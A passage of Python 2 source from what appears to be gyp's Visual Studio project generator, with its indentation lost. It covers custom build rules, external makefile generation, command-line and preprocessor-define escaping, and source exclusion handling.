'AdditionalDependencies': ';'.join(inputs),
'Outputs': ';'.join(outputs),
'CommandLine': cmd,
})
# Add to the properties of primary input for each config.
for config_name, c_data in spec['configurations'].iteritems():
p.AddFileConfig(_FixPath(primary_input),
_ConfigFullName(config_name, c_data), tools=[tool])
def _AddAccumulatedActionsToMSVS(p, spec, actions_dict):
"""Add actions accumulated into an actions_dict, merging as needed.
Arguments:
p: the target project
spec: the target project dict
actions_dict: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
"""
for primary_input in actions_dict:
inputs = OrderedSet()
outputs = OrderedSet()
descriptions = []
commands = []
for action in actions_dict[primary_input]:
inputs.update(OrderedSet(action['inputs']))
outputs.update(OrderedSet(action['outputs']))
descriptions.append(action['description'])
commands.append(action['command'])
# Add the custom build step for one input file.
description = ', and also '.join(descriptions)
command = '\r\n'.join(commands)
_AddCustomBuildToolForMSVS(p, spec,
primary_input=primary_input,
inputs=inputs,
outputs=outputs,
description=description,
cmd=command)
def _RuleExpandPath(path, input_file):
"""Given the input file to which a rule applied, string substitute a path.
Arguments:
path: a path to string expand
input_file: the file to which the rule applied.
Returns:
The string substituted path.
"""
path = path.replace('$(InputName)',
os.path.splitext(os.path.split(input_file)[1])[0])
path = path.replace('$(InputDir)', os.path.dirname(input_file))
path = path.replace('$(InputExt)',
os.path.splitext(os.path.split(input_file)[1])[1])
path = path.replace('$(InputFileName)', os.path.split(input_file)[1])
path = path.replace('$(InputPath)', input_file)
return path
def _FindRuleTriggerFiles(rule, sources):
"""Find the list of files which a particular rule applies to.
Arguments:
rule: the rule in question
sources: the set of all known source files for this project
Returns:
The list of sources that trigger a particular rule.
"""
return rule.get('rule_sources', [])
def _RuleInputsAndOutputs(rule, trigger_file):
"""Find the inputs and outputs generated by a rule.
Arguments:
rule: the rule in question.
trigger_file: the main trigger for this rule.
Returns:
The pair of (inputs, outputs) involved in this rule.
"""
raw_inputs = _FixPaths(rule.get('inputs', []))
raw_outputs = _FixPaths(rule.get('outputs', []))
inputs = OrderedSet()
outputs = OrderedSet()
inputs.add(trigger_file)
for i in raw_inputs:
inputs.add(_RuleExpandPath(i, trigger_file))
for o in raw_outputs:
outputs.add(_RuleExpandPath(o, trigger_file))
return (inputs, outputs)
def _GenerateNativeRulesForMSVS(p, rules, output_dir, spec, options):
"""Generate a native rules file.
Arguments:
p: the target project
rules: the set of rules to include
output_dir: the directory in which the project/gyp resides
spec: the project dict
options: global generator options
"""
rules_filename = '%s%s.rules' % (spec['target_name'],
options.suffix)
rules_file = MSVSToolFile.Writer(os.path.join(output_dir, rules_filename),
spec['target_name'])
# Add each rule.
for r in rules:
rule_name = r['rule_name']
rule_ext = r['extension']
inputs = _FixPaths(r.get('inputs', []))
outputs = _FixPaths(r.get('outputs', []))
# Skip a rule with no action and no inputs.
if 'action' not in r and not r.get('rule_sources', []):
continue
cmd = _BuildCommandLineForRule(spec, r, has_input_path=True,
do_setup_env=True)
rules_file.AddCustomBuildRule(name=rule_name,
description=r.get('message', rule_name),
extensions=[rule_ext],
additional_dependencies=inputs,
outputs=outputs,
cmd=cmd)
# Write out rules file.
rules_file.WriteIfChanged()
# Add rules file to project.
p.AddToolFile(rules_filename)
def _Cygwinify(path):
path = path.replace('$(OutDir)', '$(OutDirCygwin)')
path = path.replace('$(IntDir)', '$(IntDirCygwin)')
return path
def _GenerateExternalRules(rules, output_dir, spec,
sources, options, actions_to_add):
"""Generate an external makefile to do a set of rules.
Arguments:
rules: the list of rules to include
output_dir: path containing project and gyp files
spec: project specification data
sources: set of sources known
options: global generator options
actions_to_add: The list of actions we will add to.
"""
filename = '%s_rules%s.mk' % (spec['target_name'], options.suffix)
mk_file = gyp.common.WriteOnDiff(os.path.join(output_dir, filename))
# Find cygwin style versions of some paths.
mk_file.write('OutDirCygwin:=$(shell cygpath -u "$(OutDir)")\n')
mk_file.write('IntDirCygwin:=$(shell cygpath -u "$(IntDir)")\n')
# Gather stuff needed to emit all: target.
all_inputs = OrderedSet()
all_outputs = OrderedSet()
all_output_dirs = OrderedSet()
first_outputs = []
for rule in rules:
trigger_files = _FindRuleTriggerFiles(rule, sources)
for tf in trigger_files:
inputs, outputs = _RuleInputsAndOutputs(rule, tf)
all_inputs.update(OrderedSet(inputs))
all_outputs.update(OrderedSet(outputs))
# Only use one target from each rule as the dependency for
# 'all' so we don't try to build each rule multiple times.
first_outputs.append(list(outputs)[0])
# Get the unique output directories for this rule.
output_dirs = [os.path.split(i)[0] for i in outputs]
for od in output_dirs:
all_output_dirs.add(od)
first_outputs_cyg = [_Cygwinify(i) for i in first_outputs]
# Write out all: target, including mkdir for each output directory.
mk_file.write('all: %s\n' % ' '.join(first_outputs_cyg))
for od in all_output_dirs:
if od:
mk_file.write('\tmkdir -p `cygpath -u "%s"`\n' % od)
mk_file.write('\n')
# Define how each output is generated.
for rule in rules:
trigger_files = _FindRuleTriggerFiles(rule, sources)
for tf in trigger_files:
# Get all the inputs and outputs for this rule for this trigger file.
inputs, outputs = _RuleInputsAndOutputs(rule, tf)
inputs = [_Cygwinify(i) for i in inputs]
outputs = [_Cygwinify(i) for i in outputs]
# Prepare the command line for this rule.
cmd = [_RuleExpandPath(c, tf) for c in rule['action']]
cmd = ['"%s"' % i for i in cmd]
cmd = ' '.join(cmd)
# Add it to the makefile.
mk_file.write('%s: %s\n' % (' '.join(outputs), ' '.join(inputs)))
mk_file.write('\t%s\n\n' % cmd)
# Close up the file.
mk_file.close()
# Add makefile to list of sources.
sources.add(filename)
# Add a build action to call makefile.
cmd = ['make',
'OutDir=$(OutDir)',
'IntDir=$(IntDir)',
'-j', '${NUMBER_OF_PROCESSORS_PLUS_1}',
'-f', filename]
cmd = _BuildCommandLineForRuleRaw(spec, cmd, True, False, True, True)
# Insert makefile as 0'th input, so it gets the action attached there,
# as this is easier to understand from in the IDE.
all_inputs = list(all_inputs)
all_inputs.insert(0, filename)
_AddActionStep(actions_to_add,
inputs=_FixPaths(all_inputs),
outputs=_FixPaths(all_outputs),
description='Running external rules for %s' %
spec['target_name'],
command=cmd)
def _EscapeEnvironmentVariableExpansion(s):
"""Escapes % characters.
Escapes any % characters so that Windows-style environment variable
expansions will leave them alone.
See http://connect.microsoft.com/VisualStudio/feedback/details/106127/cl-d-name-text-containing-percentage-characters-doesnt-compile
to understand why we have to do this.
Args:
s: The string to be escaped.
Returns:
The escaped string.
"""
s = s.replace('%', '%%')
return s
quote_replacer_regex = re.compile(r'(\\*)"')
def _EscapeCommandLineArgumentForMSVS(s):
"""Escapes a Windows command-line argument.
So that the Win32 CommandLineToArgv function will turn the escaped result back
into the original string.
See http://msdn.microsoft.com/en-us/library/17w5ykft.aspx
("Parsing C++ Command-Line Arguments") to understand why we have to do
this.
Args:
s: the string to be escaped.
Returns:
the escaped string.
"""
def _Replace(match):
# For a literal quote, CommandLineToArgv requires an odd number of
# backslashes preceding it, and it produces half as many literal backslashes
# (rounded down). So we need to produce 2n+1 backslashes.
return 2 * match.group(1) + '\\"'
# Escape all quotes so that they are interpreted literally.
s = quote_replacer_regex.sub(_Replace, s)
# Now add unescaped quotes so that any whitespace is interpreted literally.
s = '"' + s + '"'
return s
delimiters_replacer_regex = re.compile(r'(\\*)([,;]+)')
def _EscapeVCProjCommandLineArgListItem(s):
"""Escapes command line arguments for MSVS.
The VCProj format stores string lists in a single string using commas and
semi-colons as separators, which must be quoted if they are to be
interpreted literally. However, command-line arguments may already have
quotes, and the VCProj parser is ignorant of the backslash escaping
convention used by CommandLineToArgv, so the command-line quotes and the
VCProj quotes may not be the same quotes. So to store a general
command-line argument in a VCProj list, we need to parse the existing
quoting according to VCProj's convention and quote any delimiters that are
not already quoted by that convention. The quotes that we add will also be
seen by CommandLineToArgv, so if backslashes precede them then we also have
to escape those backslashes according to the CommandLineToArgv
convention.
Args:
s: the string to be escaped.
Returns:
the escaped string.
"""
def _Replace(match):
# For a non-literal quote, CommandLineToArgv requires an even number of
# backslashes preceding it, and it produces half as many literal
# backslashes. So we need to produce 2n backslashes.
return 2 * match.group(1) + '"' + match.group(2) + '"'
segments = s.split('"')
# The unquoted segments are at the even-numbered indices.
for i in range(0, len(segments), 2):
segments[i] = delimiters_replacer_regex.sub(_Replace, segments[i])
# Concatenate back into a single string
s = '"'.join(segments)
if len(segments) % 2 == 0:
# String ends while still quoted according to VCProj's convention. This
# means the delimiter and the next list item that follow this one in the
# .vcproj file will be misinterpreted as part of this item. There is nothing
# we can do about this. Adding an extra quote would correct the problem in
# the VCProj but cause the same problem on the final command-line. Moving
# the item to the end of the list does works, but that's only possible if
# there's only one such item. Let's just warn the user.
print >> sys.stderr, ('Warning: MSVS may misinterpret the odd number of ' +
'quotes in ' + s)
return s
def _EscapeCppDefineForMSVS(s):
"""Escapes a CPP define so that it will reach the compiler unaltered."""
s = _EscapeEnvironmentVariableExpansion(s)
s = _EscapeCommandLineArgumentForMSVS(s)
s = _EscapeVCProjCommandLineArgListItem(s)
# cl.exe replaces literal # characters with = in preprocesor definitions for
# some reason. Octal-encode to work around that.
s = s.replace('#', '\\%03o' % ord('#'))
return s
quote_replacer_regex2 = re.compile(r'(\\+)"')
def _EscapeCommandLineArgumentForMSBuild(s):
"""Escapes a Windows command-line argument for use by MSBuild."""
def _Replace(match):
return (len(match.group(1)) / 2 * 4) * '\\' + '\\"'
# Escape all quotes so that they are interpreted literally.
s = quote_replacer_regex2.sub(_Replace, s)
return s
def _EscapeMSBuildSpecialCharacters(s):
escape_dictionary = {
'%': '%25',
'$': '%24',
'@': '%40',
"'": '%27',
';': '%3B',
'?': '%3F',
'*': '%2A'
}
result = ''.join([escape_dictionary.get(c, c) for c in s])
return result
def _EscapeCppDefineForMSBuild(s):
"""Escapes a CPP define so that it will reach the compiler unaltered."""
s = _EscapeEnvironmentVariableExpansion(s)
s = _EscapeCommandLineArgumentForMSBuild(s)
s = _EscapeMSBuildSpecialCharacters(s)
# cl.exe replaces literal # characters with = in preprocesor definitions for
# some reason. Octal-encode to work around that.
s = s.replace('#', '\\%03o' % ord('#'))
return s
def _GenerateRulesForMSVS(p, output_dir, options, spec,
sources, excluded_sources,
actions_to_add):
"""Generate all the rules for a particular project.
Arguments:
p: the project
output_dir: directory to emit rules to
options: global options passed to the generator
spec: the specification for this project
sources: the set of all known source files in this project
excluded_sources: the set of sources excluded from normal processing
actions_to_add: deferred list of actions to add in
"""
rules = spec.get('rules', [])
rules_native = [r for r in rules if not int(r.get('msvs_external_rule', 0))]
rules_external = [r for r in rules if int(r.get('msvs_external_rule', 0))]
# Handle rules that use a native rules file.
if rules_native:
_GenerateNativeRulesForMSVS(p, rules_native, output_dir, spec, options)
# Handle external rules (non-native rules).
if rules_external:
_GenerateExternalRules(rules_external, output_dir, spec,
sources, options, actions_to_add)
_AdjustSourcesForRules(spec, rules, sources, excluded_sources)
def _AdjustSourcesForRules(spec, rules, sources, excluded_sources):
# Add outputs generated by each rule (if applicable).
for rule in rules:
# Done if not processing outputs as sources.
if int(rule.get('process_outputs_as_sources', False)):
# Add in the outputs from this rule.
trigger_files = _FindRuleTriggerFiles(rule, sources)
for trigger_file in trigger_files:
inputs, outputs = _RuleInputsAndOutputs(rule, trigger_file)
inputs = OrderedSet(_FixPaths(inputs))
outputs = OrderedSet(_FixPaths(outputs))
inputs.remove(_FixPath(trigger_file))
sources.update(inputs)
if not spec.get('msvs_external_builder'):
excluded_sources.update(inputs)
sources.update(outputs)
def _FilterActionsFromExcluded(excluded_sources, actions_to_add):
"""Take inputs with actions attached out of the list of exclusions.
Arguments:
excluded_sources: list of source files not to be built.
actions_to_add: dict of actions keyed on source file they're attached to.
Returns:
excluded_sources with files that have actions attached removed.
"""
must_keep = OrderedSet(_FixPaths(actions_to_add.keys()))
return [s for s in excluded_sources if s not in must_keep]
def _GetDefaultConfiguration(spec):
return spec['configurations'][spec['default_configuration']]
def _GetGuidOfProject(proj_path, spec):
"""Get the guid for the project.
Arguments:
proj_path: Path of the vcproj or vcxproj file to generate.
spec: The target dictionary containing the properties of the target.
Returns:
the guid.
Raises:
ValueError: if the specified GUID is invalid.
"""
# Pluck out the default configuration.
default_config = _GetDefaultConfiguration(spec)
# Decide the guid of the project.
guid = default_config.get('msvs_guid')
if guid:
if VALID_MSVS_GUID_CHARS.match(guid) is None:
raise ValueError('Invalid MSVS guid: "%s". Must match regex: "%s".' %
(guid, VALID_MSVS_GUID_CHARS.pattern))
guid = '{%s}' % guid
guid = guid or MSVSNew.MakeGuid(proj_path)
return guid
def _GetMsbuildToolsetOfProject(proj_path, spec, version):
"""Get the platform toolset for the project.
Arguments:
proj_path: Path of the vcproj or vcxproj file to generate.
spec: The target dictionary containing the properties of the target.
version: The MSVSVersion object.
Returns:
the platform toolset string or None.
"""
# Pluck out the default configuration.
default_config = _GetDefaultConfiguration(spec)
toolset = default_config.get('msbuild_toolset')
if not toolset and version.DefaultToolset():
toolset = version.DefaultToolset()
return toolset
def _GenerateProject(project, options, version, generator_flags):
"""Generates a vcproj file.
Arguments:
project: the MSVSProject object.
options: global generator options.
version: the MSVSVersion object.
generator_flags: dict of generator-specific flags.
Returns:
A list of source files that cannot be found on disk.
"""
default_config = _GetDefaultConfiguration(project.spec)
# Skip emitting anything if told to with msvs_existing_vcproj option.
if default_config.get('msvs_existing_vcproj'):
return []
if version.UsesVcxproj():
return _GenerateMSBuildProject(project, options, version, generator_flags)
else:
return _GenerateMSVSProject(project, options, version, generator_flags)
def _GenerateMSVSProject(project, options, version, generator_flags):
"""Generates a .vcproj file. It may create .rules and .user files too.
Arguments:
project: The project object we will generate the file for.
options: Global options passed to the generator.
version: The VisualStudioVersion object.
generator_flags: dict of generator-specific flags.
"""
spec = project.spec
gyp.common.EnsureDirExists(project.path)
platforms = _GetUniquePlatforms(spec)
p = MSVSProject.Writer(project.path, version, spec['target_name'],
project.guid, platforms)
# Get directory project file is in.
project_dir = os.path.split(project.path)[0]
gyp_path = _NormalizedSource(project.build_file)
relative_path_of_gyp_file = gyp.common.RelativePath(gyp_path, project_dir)
config_type = _GetMSVSConfigurationType(spec, project.build_file)
for config_name, config in spec['configurations'].iteritems():
_AddConfigurationToMSVSProject(p, spec, config_type, config_name, config)
# Prepare list of sources and excluded sources.
gyp_file = os.path.split(project.build_file)[1]
sources, excluded_sources = _PrepareListOfSources(spec, generator_flags,
gyp_file)
# Add rules.
actions_to_add = {}
_GenerateRulesForMSVS(p, project_dir, options, spec,
sources, excluded_sources,
actions_to_add)
list_excluded = generator_flags.get('msvs_list_excluded_files', True)
sources, excluded_sources, excluded_idl = (
_AdjustSourcesAndConvertToFilterHierarchy(
spec, options, project_dir, sources, excluded_sources, list_excluded))
# Add in files.
missing_sources = _VerifySourcesExist(sources, project_dir)
p.AddFiles(sources)
_AddToolFilesToMSVS(p, spec)
_HandlePreCompiledHeaders(p, sources, spec)
_AddActions(actions_to_add, spec, relative_path_of_gyp_file)
_AddCopies(actions_to_add, spec)
_WriteMSVSUserFile(project.path, version, spec)
# NOTE: this stanza must appear after all actions have been decided.
# Don't excluded sources with actions attached, or they won't run.
excluded_sources = _FilterActionsFromExcluded(
excluded_sources, actions_to_add)
_ExcludeFilesFromBeingBuilt(p, spec, excluded_sources, excluded_idl,
list_excluded)
_AddAccumulatedActionsToMSVS(p, spec, actions_to_add)
# Write it out.
p.WriteIfChanged()
return missing_sources
def _GetUniquePlatforms(spec):
"""Returns the list of unique platforms for this spec, e.g ['win32', ...].
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
The MSVSUserFile object created.
"""
# Gather list of unique platforms.
platforms = OrderedSet()
for configuration in spec['configurations']:
platforms.add(_ConfigPlatform(spec['configurations'][configuration]))
platforms = list(platforms)
return platforms
def _CreateMSVSUserFile(proj_path, version, spec):
"""Generates a .user file for the user running this Gyp program.
Arguments:
proj_path: The path of the project file being created. The .user file
shares the same path (with an appropriate suffix).
version: The VisualStudioVersion object.
spec: The target dictionary containing the properties of the target.
Returns:
The MSVSUserFile object created.
"""
(domain, username) = _GetDomainAndUserName()
vcuser_filename = '.'.join([proj_path, domain, username, 'user'])
user_file = MSVSUserFile.Writer(vcuser_filename, version,
spec['target_name'])
return user_file
def _GetMSVSConfigurationType(spec, build_file):
"""Returns the configuration type for this project.
It's a number defined by Microsoft. May raise an exception.
Args:
spec: The target dictionary containing the properties of the target.
build_file: The path of the gyp file.
Returns:
An integer, the configuration type.
"""
try:
config_type = {
'executable': '1', # .exe
'shared_library': '2', # .dll
'loadable_module': '2', # .dll
'static_library': '4', # .lib
'none': '10', # Utility type
}[spec['type']]
except KeyError:
if spec.get('type'):
raise GypError('Target type %s is not a valid target type for '
'target %s in %s.' %
(spec['type'], spec['target_name'], build_file))
else:
raise GypError('Missing type field for target %s in %s.' %
(spec['target_name'], build_file))
return config_type
def _AddConfigurationToMSVSProject(p, spec, config_type, config_name, config):
"""Adds a configuration to the MSVS project.
Many settings in a vcproj file are specific to a configuration. This
function the main part of the vcproj file that's configuration specific.
Arguments:
p: The target project being generated.
spec: The target dictionary containing the properties of the target.
config_type: The configuration type, a number as defined by Microsoft.
config_name: The name of the configuration.
config: The dictionary that defines the special processing to be done
for this configuration.
"""
# Get the information for this configuration
include_dirs, resource_include_dirs = _GetIncludeDirs(config)
libraries = _GetLibraries(spec)
library_dirs = _GetLibraryDirs(config)
out_file, vc_tool, _ = _GetOutputFilePathAndTool(spec, msbuild=False)
defines = _GetDefines(config)
defines = [_EscapeCppDefineForMSVS(d) for d in defines]
disabled_warnings = _GetDisabledWarnings(config)
prebuild = config.get('msvs_prebuild')
postbuild = config.get('msvs_postbuild')
def_file = _GetModuleDefinition(spec)
precompiled_header = config.get('msvs_precompiled_header')
# Prepare the list of tools as a dictionary.
tools = dict()
# Add in user specified msvs_settings.
msvs_settings = config.get('msvs_settings', {})
MSVSSettings.ValidateMSVSSettings(msvs_settings)
# Prevent default library inheritance from the environment.
_ToolAppend(tools, 'VCLinkerTool', 'AdditionalDependencies', ['$(NOINHERIT)'])
for tool in msvs_settings:
settings = config['msvs_settings'][tool]
for setting in settings:
_ToolAppend(tools, tool, setting, settings[setting])
# Add the information to the appropriate tool
_ToolAppend(tools, 'VCCLCompilerTool',
'AdditionalIncludeDirectories', include_dirs)
_ToolAppend(tools, 'VCResourceCompilerTool',
'AdditionalIncludeDirectories', resource_include_dirs)
# Add in libraries.
_ToolAppend(tools, 'VCLinkerTool', 'AdditionalDependencies', libraries)
_ToolAppend(tools, 'VCLinkerTool', 'AdditionalLibraryDirectories',
library_dirs)
if out_file:
_ToolAppend(tools, vc_tool, 'OutputFile', out_file, only_if_unset=True)
# Add defines.
_ToolAppend(tools, 'VCCLCompilerTool', 'PreprocessorDefinitions', defines)
_ToolAppend(tools, 'VCResourceCompilerTool', 'PreprocessorDefinitions',
defines)
# Change program database directory to prevent collisions.
_ToolAppend(tools, 'VCCLCompilerTool', 'ProgramDataBaseFileName',
'$(IntDir)$(ProjectName)\\vc80.pdb', only_if_unset=True)
# Add disabled warnings.
_ToolAppend(tools, 'VCCLCompilerTool',
'DisableSpecificWarnings', disabled_warnings)
# Add Pre-build.
_ToolAppend(tools, 'VCPreBuildEventTool', 'CommandLine', prebuild)
# Add Post-build.
_ToolAppend(tools, 'VCPostBuildEventTool', 'CommandLine', postbuild)
# Turn on precompiled headers if appropriate.
if precompiled_header:
precompiled_header = os.path.split(precompiled_header)[1]
_ToolAppend(tools, 'VCCLCompilerTool', 'UsePrecompiledHeader', '2')
_ToolAppend(tools, 'VCCLCompilerTool',
'PrecompiledHeaderThrough', precompiled_header)
_ToolAppend(tools, 'VCCLCompilerTool',
'ForcedIncludeFiles', precompiled_header)
# Loadable modules don't generate import libraries;
# tell dependent projects to not expect one.
if spec['type'] == 'loadable_module':
_ToolAppend(tools, 'VCLinkerTool', 'IgnoreImportLibrary', 'true')
# Set the module definition file if any.
if def_file:
_ToolAppend(tools, 'VCLinkerTool', 'ModuleDefinitionFile', def_file)
_AddConfigurationToMSVS(p, spec, tools, config, config_type, config_name)
def _GetIncludeDirs(config):
"""Returns the list of directories to be used for #include directives.
Arguments:
config: The dictionary that defines the special processing to be done
for this configuration.
Returns:
The list of directory paths.
"""
# TODO(bradnelson): include_dirs should really be flexible enough not to
# require this sort of thing.
include_dirs = (
config.get('include_dirs', []) +
config.get('msvs_system_include_dirs', []))
resource_include_dirs = config.get('resource_include_dirs', include_dirs)
include_dirs = _FixPaths(include_dirs)
resource_include_dirs = _FixPaths(resource_include_dirs)
return include_dirs, resource_include_dirs
def _GetLibraryDirs(config):
"""Returns the list of directories to be used for library search paths.
Arguments:
config: The dictionary that defines the special processing to be done
for this configuration.
Returns:
The list of directory paths.
"""
library_dirs = config.get('library_dirs', [])
library_dirs = _FixPaths(library_dirs)
return library_dirs
def _GetLibraries(spec):
"""Returns the list of libraries for this configuration.
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
The list of directory paths.
"""
libraries = spec.get('libraries', [])
# Strip out -l, as it is not used on windows (but is needed so we can pass
# in libraries that are assumed to be in the default library path).
# Also remove duplicate entries, leaving only the last duplicate, while
# preserving order.
found = OrderedSet()
unique_libraries_list = []
for entry in reversed(libraries):
library = re.sub('^\-l', '', entry)
if not os.path.splitext(library)[1]:
library += '.lib'
if library not in found:
found.add(library)
unique_libraries_list.append(library)
unique_libraries_list.reverse()
return unique_libraries_list
def _GetOutputFilePathAndTool(spec, msbuild):
"""Returns the path and tool to use for this target.
Figures out the path of the file this spec will create and the name of
the VC tool that will create it.
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
A triple of (file path, name of the vc tool, name of the msbuild tool)
"""
# Select a name for the output file.
out_file = ''
vc_tool = ''
msbuild_tool = ''
output_file_map = {
'executable': ('VCLinkerTool', 'Link', '$(OutDir)', '.exe'),
'shared_library': ('VCLinkerTool', 'Link', '$(OutDir)', '.dll'),
'loadable_module': ('VCLinkerTool', 'Link', '$(OutDir)', '.dll'),
'static_library': ('VCLibrarianTool', 'Lib', '$(OutDir)lib\\', '.lib'),
}
output_file_props = output_file_map.get(spec['type'])
if output_file_props and int(spec.get('msvs_auto_output_file', 1)):
vc_tool, msbuild_tool, out_dir, suffix = output_file_props
if spec.get('standalone_static_library', 0):
out_dir = '$(OutDir)'
out_dir = spec.get('product_dir', out_dir)
product_extension = spec.get('product_extension')
if product_extension:
suffix = '.' + product_extension
elif msbuild:
suffix = '$(TargetExt)'
prefix = spec.get('product_prefix', '')
product_name = spec.get('product_name', '$(ProjectName)')
out_file = ntpath.join(out_dir, prefix + product_name + suffix)
return out_file, vc_tool, msbuild_tool
def _GetOutputTargetExt(spec):
"""Returns the extension for this target, including the dot
If product_extension is specified, set target_extension to this to avoid
MSB8012, returns None otherwise. Ignores any target_extension settings in
the input files.
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
A string with the extension, or None
"""
target_extension = spec.get('product_extension')
if target_extension:
return '.' + target_extension
return None
def _GetDefines(config):
"""Returns the list of preprocessor definitions for this configuation.
Arguments:
config: The dictionary that defines the special processing to be done
for this configuration.
Returns:
The list of preprocessor definitions.
"""
defines = []
for d in config.get('defines', []):
if type(d) == list:
fd = '='.join([str(dpart) for dpart in d])
else:
fd = str(d)
defines.append(fd)
return defines
def _GetDisabledWarnings(config):
return [str(i) for i in config.get('msvs_disabled_warnings', [])]
def _GetModuleDefinition(spec):
def_file = ''
if spec['type'] in ['shared_library', 'loadable_module', 'executable']:
def_files = [s for s in spec.get('sources', []) if s.endswith('.def')]
if len(def_files) == 1:
def_file = _FixPath(def_files[0])
elif def_files:
raise ValueError(
'Multiple module definition files in one target, target %s lists '
'multiple .def files: %s' % (
spec['target_name'], ' '.join(def_files)))
return def_file
def _ConvertToolsToExpectedForm(tools):
"""Convert tools to a form expected by Visual Studio.
Arguments:
tools: A dictionary of settings; the tool name is the key.
Returns:
A list of Tool objects.
"""
tool_list = []
for tool, settings in tools.iteritems():
# Collapse settings with lists.
settings_fixed = {}
for setting, value in settings.iteritems():
if type(value) == list:
if ((tool == 'VCLinkerTool' and
setting == 'AdditionalDependencies') or
setting == 'AdditionalOptions'):
settings_fixed[setting] = ' '.join(value)
else:
settings_fixed[setting] = ';'.join(value)
else:
settings_fixed[setting] = value
# Add in this tool.
tool_list.append(MSVSProject.Tool(tool, settings_fixed))
return tool_list
def _AddConfigurationToMSVS(p, spec, tools, config, config_type, config_name):
"""Add to the project file the configuration specified by config.
Arguments:
p: The target project being generated.
spec: the target project dict.
tools: A dictionary of settings; the tool name is the key.
config: The dictionary that defines the special processing to be done
for this configuration.
config_type: The configuration type, a number as defined by Microsoft.
config_name: The name of the configuration.
"""
attributes = _GetMSVSAttributes(spec, config, config_type)
# Add in this configuration.
tool_list = _ConvertToolsToExpectedForm(tools)
p.AddConfig(_ConfigFullName(config_name, config),
attrs=attributes, tools=tool_list)
def _GetMSVSAttributes(spec, config, config_type):
# Prepare configuration attributes.
prepared_attrs = {}
source_attrs = config.get('msvs_configuration_attributes', {})
for a in source_attrs:
prepared_attrs[a] = source_attrs[a]
# Add props files.
vsprops_dirs = config.get('msvs_props', [])
vsprops_dirs = _FixPaths(vsprops_dirs)
if vsprops_dirs:
prepared_attrs['InheritedPropertySheets'] = ';'.join(vsprops_dirs)
# Set configuration type.
prepared_attrs['ConfigurationType'] = config_type
output_dir = prepared_attrs.get('OutputDirectory',
'$(SolutionDir)$(ConfigurationName)')
prepared_attrs['OutputDirectory'] = _FixPath(output_dir) + '\\'
if 'IntermediateDirectory' not in prepared_attrs:
intermediate = '$(ConfigurationName)\\obj\\$(ProjectName)'
prepared_attrs['IntermediateDirectory'] = _FixPath(intermediate) + '\\'
else:
intermediate = _FixPath(prepared_attrs['IntermediateDirectory']) + '\\'
intermediate = MSVSSettings.FixVCMacroSlashes(intermediate)
prepared_attrs['IntermediateDirectory'] = intermediate
return prepared_attrs
def _AddNormalizedSources(sources_set, sources_array):
sources_set.update(_NormalizedSource(s) for s in sources_array)
def _PrepareListOfSources(spec, generator_flags, gyp_file):
"""Prepare list of sources and excluded sources.
Besides the sources specified directly in the spec, adds the gyp file so
that a change to it will cause a re-compile. Also adds appropriate sources
for actions and copies. Assumes later stage will un-exclude files which
have custom build steps attached.
Arguments:
spec: The target dictionary containing the properties of the target.
gyp_file: The name of the gyp file.
Returns:
A pair of (list of sources, list of excluded sources).
The sources will be relative to the gyp file.
"""
sources = OrderedSet()
_AddNormalizedSources(sources, spec.get('sources', []))
excluded_sources = OrderedSet()
# Add in the gyp file.
if not generator_flags.get('standalone'):
sources.add(gyp_file)
# Add in 'action' inputs and outputs.
for a in spec.get('actions', []):
inputs = a['inputs']
inputs = [_NormalizedSource(i) for i in inputs]
# Add all inputs to sources and excluded sources.
inputs = OrderedSet(inputs)
sources.update(inputs)
if not spec.get('msvs_external_builder'):
excluded_sources.update(inputs)
if int(a.get('process_outputs_as_sources', False)):
_AddNormalizedSources(sources, a.get('outputs', []))
# Add in 'copies' inputs and outputs.
for cpy in spec.get('copies', []):
_AddNormalizedSources(sources, cpy.get('files', []))
return (sources, excluded_sources)
def _AdjustSourcesAndConvertToFilterHierarchy(
spec, options, gyp_dir, sources, excluded_sources, list_excluded):
"""Adjusts the list of sources and excluded sources.
Also converts the sets to lists.
Arguments:
spec: The target dictionary containing the properties of the target.
options: Global generator options.
gyp_dir: The path to the gyp file being processed.
sources: A set of sources to be included for this project.
excluded_sources: A set of sources to be excluded for this project.
Returns:
A trio of (list of sources, list of excluded sources,
path of excluded IDL file)
"""
# Exclude excluded sources coming into the generator.
excluded_sources.update(OrderedSet(spec.get('sources_excluded', [])))
# Add excluded sources into sources for good measure.
sources.update(excluded_sources)
# Convert to proper windows form.
# NOTE: sources goes from being a set to a list here.
# NOTE: excluded_sources goes from being a set to a list here.
sources = _FixPaths(sources)
# Convert to proper windows form.
excluded_sources = _FixPaths(excluded_sources)
excluded_idl = _IdlFilesHandledNonNatively(spec, sources)
precompiled_related = _GetPrecompileRelatedFiles(spec)
# Find the excluded ones, minus the precompiled header related ones.
fully_excluded = [i for i in excluded_sources if i not in precompiled_related]
# Convert to folders and the right slashes.
sources = [i.split('\\') for i in sources]
sources = _ConvertSourcesToFilterHierarchy(sources, excluded=fully_excluded,
list_excluded=list_excluded)
# Prune filters with a single child to flatten ugly directory structures
# such as ../../src/modules/module1 etc.
while len(sources) == 1 and isinstance(sources[0], MSVSProject.Filter):
sources = sources[0].contents
return sources, excluded_sources, excluded_idl
def _IdlFilesHandledNonNatively(spec, sources):
# If any non-native rules use 'idl' as an extension exclude idl files.
# Gather a list here to use later.
using_idl = False
for rule in spec.get('rules', []):
if rule['extension'] == 'idl' and int(rule.get('msvs_external_rule', 0)):
using_idl = True
break
if using_idl:
excluded_idl = [i for i in sources if i.endswith('.idl')]
else:
excluded_idl = []
return excluded_idl
def _GetPrecompileRelatedFiles(spec):
# Gather a list of precompiled header related sources.
precompiled_related = []
for _, config in spec['configurations'].iteritems():
for k in precomp_keys:
f = config.get(k)
if f:
precompiled_related.append(_FixPath(f))
return precompiled_related
def _ExcludeFilesFromBeingBuilt(p, spec, excluded_sources, excluded_idl,
list_excluded):
exclusions = _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl)
for file_name, excluded_configs in exclusions.iteritems():
if (not list_excluded and
len(excluded_configs) == len(spec['configurations'])):
# If we're not listing excluded files, then they won't appear in the
# project, so don't try to configure them to be excluded.
pass
else:
for config_name, config in excluded_configs:
p.AddFileConfig(file_name, _ConfigFullName(config_name, config),
{'ExcludedFromBuild': 'true'})
def _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl):
exclusions = {}
# Exclude excluded sources from being built.
for f in excluded_sources:
excluded_configs = []
for config_name, config in spec['configurations'].iteritems():
